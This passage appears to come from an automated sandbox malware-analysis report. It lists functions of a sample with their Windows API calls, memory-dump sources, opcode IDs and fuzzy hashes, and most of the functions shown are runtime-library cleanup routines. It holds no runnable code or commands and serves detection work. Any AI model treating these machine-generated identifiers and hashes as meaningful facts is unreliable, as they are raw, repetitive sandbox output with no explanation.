                                                • Instruction Fuzzy Hash: 79323870D046288FDB2ACF68CC51BDEBBB1BF98310F1482E9D559AB291DB705A85CF50
                                                Function 0035F0AD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0035F0A8,?,?,00000008,?,?,0035ED40,00000000), ref: 0035F2DA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 0386564e46f068fe0136159535aa27455fe963847c5f2f48120bee34100252dc
                                                • Instruction ID: b70a6fd7e50f9877e94808e30f73b466a495fa36db78e962840617bbd46ad9f0
                                                • Opcode Fuzzy Hash: 0386564e46f068fe0136159535aa27455fe963847c5f2f48120bee34100252dc
                                                • Instruction Fuzzy Hash: 79B14D75610609DFD716CF28C486F647BA0FF45365F2A8668E89ACF2B1C335EA85CB40
                                                Function 00349A99 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00349AAF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-0
                                                • Opcode ID: 2c198a97b6385abaf9235f293ff2b5dc93486a44c3b10af6a8bdc5344a9ff5d5
                                                • Instruction ID: 03b36d5391ebdeee3ed46f9e4729359aa010b2932ea9051dda8f925fff0d573b
                                                • Opcode Fuzzy Hash: 2c198a97b6385abaf9235f293ff2b5dc93486a44c3b10af6a8bdc5344a9ff5d5
                                                • Instruction Fuzzy Hash: A55129B5A002058BEB16CF55E8C57AABBF8FB48315F25C46AD805EF260D3B5AD44CF60
                                                Function 00357261 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 300182d0b14d99e6a6beaa5bbbeab8a3ddc5547a5083b0b4d5ab6ac94568ab74
                                                • Instruction ID: 93e551368fba886eea5529b3fcc8a81f22fb452247c91216035e809f194118f1
                                                • Opcode Fuzzy Hash: 300182d0b14d99e6a6beaa5bbbeab8a3ddc5547a5083b0b4d5ab6ac94568ab74
                                                • Instruction Fuzzy Hash: 1F41C5B5804218AFDF21DF79DC89EAABBB9AF45300F1442DDE80DD7211DA319E888F50
                                                Function 0033FAA0 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Kw
                                                • API String ID: 0-954361344
                                                • Opcode ID: 2d7f3f3ea8ee8835e56db3aae54a6f00fe16dff38e224b6ece325214cf0ba4a2
                                                • Instruction ID: 479432aa20a0f276a5ef3343e5f7ffda3be9fcbf24e10672210917b6837ce22c
                                                • Opcode Fuzzy Hash: 2d7f3f3ea8ee8835e56db3aae54a6f00fe16dff38e224b6ece325214cf0ba4a2
                                                • Instruction Fuzzy Hash: 4D22D174D052A88ADB26CF68C891BEDFBB0AF59304F0481D9D58DAB252DB305EC5CF51
                                                Function 003202C0 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                Download Yara Rule
                                                APIs
                                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 003203C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CtrlDispatcherServiceStart
                                                • String ID:
                                                • API String ID: 3789849863-0
                                                • Opcode ID: d7457b368cc361ce0fcc856781d7f3c73b9d47c6958cc99d2aa58386ae89bba0
                                                • Instruction ID: 3530fc84a1555fc56ad642f608841b0fa71e338324161897a2f8932df79a360f
                                                • Opcode Fuzzy Hash: d7457b368cc361ce0fcc856781d7f3c73b9d47c6958cc99d2aa58386ae89bba0
                                                • Instruction Fuzzy Hash: 07411374D0938C9BDB12CFA8E9816DDFFB0AF59314F148199D88877355EB301A8ACB51
                                                Function 00349E0F Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00039E1B,003498CC), ref: 00349E14
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: a41bfcfefe765b4134d0b8a22ba1b56e917431b5b528adf042519ee28f5123dc
                                                • Instruction ID: 51bdbab8e9de43527a103e94c64cd283d7c2ffc06f959eb34b51fef583f48b3c
                                                • Opcode Fuzzy Hash: a41bfcfefe765b4134d0b8a22ba1b56e917431b5b528adf042519ee28f5123dc
                                                • Instruction Fuzzy Hash:
                                                Function 0035162B Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 07820f821ed346ae760eef299b2d27b0ea6fa5820f43bb61b37f850f6f272a5e
                                                • Instruction ID: 8af319cdb8e988bd6240a1f5c7d28114a36eaa739edd10ddedcc296c4eed91b5
                                                • Opcode Fuzzy Hash: 07820f821ed346ae760eef299b2d27b0ea6fa5820f43bb61b37f850f6f272a5e
                                                • Instruction Fuzzy Hash: 8451B9306006486BDF3B9A6CC495FBEA79E9B06343F1E061EDC42DBAB1C6519D4CC742
                                                Function 003581A7 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: ebb6602eb0b6c7e4b31f6876df63fcf4475529bc40f52d4f6fb8c7dc26098351
                                                • Instruction ID: 19e8d6854137b26e6313e04115acf90bd2a66e4aba56267a688ab8dcb9b51552
                                                • Opcode Fuzzy Hash: ebb6602eb0b6c7e4b31f6876df63fcf4475529bc40f52d4f6fb8c7dc26098351
                                                • Instruction Fuzzy Hash: 39A011302882008F83028F3AAA083083AACBA02380B00C02AE002C2020EBA088208A00
                                                Function 00377B71 Relevance: .2, Instructions: 218COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                • Instruction ID: dabea31d5d3769a9adcddcc703ecb8ba7753f8a9404359a0d3828aa390857c02
                                                • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                • Instruction Fuzzy Hash: 81818131618B418FC73ACF29C8906AAB7E2EFD9314F14C92DD0EA87751D738A849CB45
                                                Function 0034DDEF Relevance: .2, Instructions: 159COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 438bd0cc8c98b336ea809296fdbdecc5e4b45dd137da17caf48dd9fc61ba5f12
                                                • Instruction ID: 997cd87245427569a70846328d7bf5eda6fa717464edb4475a4a6631fe13dc92
                                                • Opcode Fuzzy Hash: 438bd0cc8c98b336ea809296fdbdecc5e4b45dd137da17caf48dd9fc61ba5f12
                                                • Instruction Fuzzy Hash: DB518071E00119AFDF15CF99C981AAEBBB2EF98300F198099E915AF251C734AE55CB90
                                                Function 0035A6A3 Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46d948bd289b0c8bbc97f903f7373f877a38da151df705f58fd91a7242504a17
                                                • Instruction ID: 20fc86df6ff796aa6fb02121b7090d316171a8bbb6b026424fa29a2226fec7a8
                                                • Opcode Fuzzy Hash: 46d948bd289b0c8bbc97f903f7373f877a38da151df705f58fd91a7242504a17
                                                • Instruction Fuzzy Hash: 0821B673F204394B770CC47E8C5227DB6E1C78C601745823AE8A6EA2C1D968D917E2E4
                                                Function 0035A583 Relevance: .1, Instructions: 81COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 756fbbe120759a0d4d1b667f01f63e3bd89c4e8745df63ab17ee48946445c1ff
                                                • Instruction ID: 3632440418714df61b42477415fbdbbc417b89a807cd57760178caf1bd6614cf
                                                • Opcode Fuzzy Hash: 756fbbe120759a0d4d1b667f01f63e3bd89c4e8745df63ab17ee48946445c1ff
                                                • Instruction Fuzzy Hash: 4A11CA23F30C255B775C816D8C1327AA1D6DBD824070F433ADC26E7284F8A4DE13D290
                                                Function 00361000 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: 8f9e4feaa1bab178c7014e289a260805489fa86e9e5f4cb0076d37f98651cac5
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: 36110DB72000C283DE178A7DD5F46B7A7A6EBC6321B2EC37AD0514B75CD223E9C5A600
                                                Function 00356EFD Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6ded761d5ffa4682f073ad4b078057eac912a78cb4af02c888a94c68453cc92
                                                • Instruction ID: b5e0185288ac64f819c6e6b36e0fd24c68e61401a6c04fcf84d9e878428153f6
                                                • Opcode Fuzzy Hash: e6ded761d5ffa4682f073ad4b078057eac912a78cb4af02c888a94c68453cc92
                                                • Instruction Fuzzy Hash: E8E08C32D11228EBCB1ADB88E905D8AF7EDEB44B01B51409AF902D3120C270DE44CBD0
                                                Function 00358DCE Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 00358E12
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 003589C8
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 003589DA
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 003589EC
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 003589FE
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A10
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A22
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A34
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A46
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A58
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A6A
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A7C
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A8E
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358AA0
                                                • _free.LIBCMT ref: 00358E07
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 00358E29
                                                • _free.LIBCMT ref: 00358E3E
                                                • _free.LIBCMT ref: 00358E49
                                                • _free.LIBCMT ref: 00358E6B
                                                • _free.LIBCMT ref: 00358E7E
                                                • _free.LIBCMT ref: 00358E8C
                                                • _free.LIBCMT ref: 00358E97
                                                • _free.LIBCMT ref: 00358ECF
                                                • _free.LIBCMT ref: 00358ED6
                                                • _free.LIBCMT ref: 00358EF3
                                                • _free.LIBCMT ref: 00358F0B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID: @6$x6
                                                • API String ID: 161543041-3790332844
                                                • Opcode ID: 59ffe04663879b23d688498b927a5099fb5f5b2a46c8b778e1acea66e987d483
                                                • Instruction ID: 6cd057064c4e6b4320504d7cabfcebd65bc17112423351056e4c204233acb97d
                                                • Opcode Fuzzy Hash: 59ffe04663879b23d688498b927a5099fb5f5b2a46c8b778e1acea66e987d483
                                                • Instruction Fuzzy Hash: BC313A35600301AFEB26AB38D846F5B73F9EB00356F154829E859AB171DF74AC998710
                                                Function 00353983 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00353999
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 003539A5
                                                • _free.LIBCMT ref: 003539B0
                                                • _free.LIBCMT ref: 003539BB
                                                • _free.LIBCMT ref: 003539C6
                                                • _free.LIBCMT ref: 003539D1
                                                • _free.LIBCMT ref: 003539DC
                                                • _free.LIBCMT ref: 003539E7
                                                • _free.LIBCMT ref: 003539F2
                                                • _free.LIBCMT ref: 00353A00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID: hN6
                                                • API String ID: 776569668-415610008
                                                • Opcode ID: ce188016e9b708351dc3f296e14d6de37b35a2fa3b68e1915809a77b59586602
                                                • Instruction ID: 1161e44ff9ab7c77606d1dd31d28425a2d30f1fbebbe1b3fa1e2393b13ba7f31
